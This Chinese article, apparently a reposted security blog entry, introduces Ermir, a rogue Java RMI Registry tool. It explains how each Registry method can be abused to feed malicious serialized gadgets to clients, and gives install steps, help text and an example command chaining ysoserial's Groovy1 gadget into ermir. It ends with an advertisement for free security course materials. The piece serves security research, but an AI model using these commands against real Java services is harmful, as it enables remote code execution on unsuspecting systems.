关于Ermir
Ermir是一款功能强大的Java RMI Registry安全研究工具,该工具可以利用那些调用了标准RMI方法的Java代码中的不安全反序列化操作。
工具运行机制
java.rmi.registry.Registry提供了五种方法:list()、lookup()、bind()、rebind()、unbind()。
public Remote lookup(String name)
lookup()方法会搜索Registry中的一个绑定对象,并返回一个远程对象,返回的对象使用
_MarshalInputStream.readObject()_方法读取。Ermir可以使用gadgetmarshal来序列化指定的对象来满足MarshalInputStream的要求:
public String[] list()
list()方法会要求Registry提供所有绑定对象的名称,而String类型不能用恶意gadget替代,因为它不是普通对象,它不是使用
readObject _()_读取的,而是使用readUTF()读取。但是,由于list()会返回String[],而它就是一个实际的对象,并会使用
readObject _()_读取,因此Ermir可以直接发送gadget来代替String[]类型:
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-W5YCNzz3-1677743414648)(https://image.3001.net/images/20221102/1667320331_63614a0bd9734d756d755.png!small)]
public void bind(java.lang.String $param_String_1, java.rmi.Remote
$param_Remote_2)
bind()方法用于绑定Registry中的一个对象,返回类型为void,ruguo
Registry在RMI返回数据包中指定需要返回一个Exception,那么客户端/服务器将会调用 readObject
_()_方法,此时Ermir将会发送一个序列化gadget而不是合法的Exception对象:
public void rebind(java.lang.String $param_String_1, java.rmi.Remote
$param_Remote_2)
rebind()方法可以使用提供的远程引用替换当前绑定的对象,并返回void,而Ermir将返回一个Exception;
public void unbind(java.lang.String $param_String_1)
unbind()方法可以通过名称解绑RMI Registry中的一个远程对象,并返回void;
工具要求
Ruby v3或更新版本
工具安装
我们可以直接通过rubygems.org来下载和安装Ermir:
$ gem install ermir
或者使用下列命令将该项目源码克隆至本地,并完成工具构建:
$ git clone https://github.com/hakivvi/ermir.git
$ rake install
工具使用
Ermir是一个CLI
gem,其中包含两个cli文件,即ermir和gadgetmarshal。ermir是实际的gem,而后者则是GadgetMarshaller.java文件的一个接口,它可以重写Ysoserial的gadget并匹配MarshalInputStream的要求,输出结果需要发送至ermir或一个文件,以防止自定义gadget使用MarshalOutputStream将你的序列化对象写入到输出流中。
ermir使用
➜ ~ ermir
Ermir by @hakivvi * https://github.com/hakivvi/ermir.
Info:
Ermir is a Rogue/Evil RMI Registry which exploits unsecure Java deserialization on any Java code calling standard RMI methods on it.
Usage: ermir [options]
-l, --listen 将RMI Registry绑定到一个IP和端口,默认为0.0.0.0:1099
-f, --file 包含需要反序列化目标gadget的文件路径
-p, --pipe 从标准输入流中读取序列化gadget
-v, --version 输出Ermir版本信息
-h, --help 打印工具帮助选项
Example:
$ gadgetmarshal /path/to/ysoserial.jar Groovy1 calc.exe | ermir --listen 127.0.0.1:1099 --pipe
gadgetmarshal使用
➜ ~ gadgetmarshal
Usage: gadgetmarshal /path/to/ysoserial.jar Gadget1 cmd (optional)/path/to/output/file
工具使用演示
最后
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
同时每个成长路线对应的板块都有配套的视频提供:
当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
因篇幅有限,仅展示部分资料,有需要的小伙伴,可以【扫下方二维码】免费领取: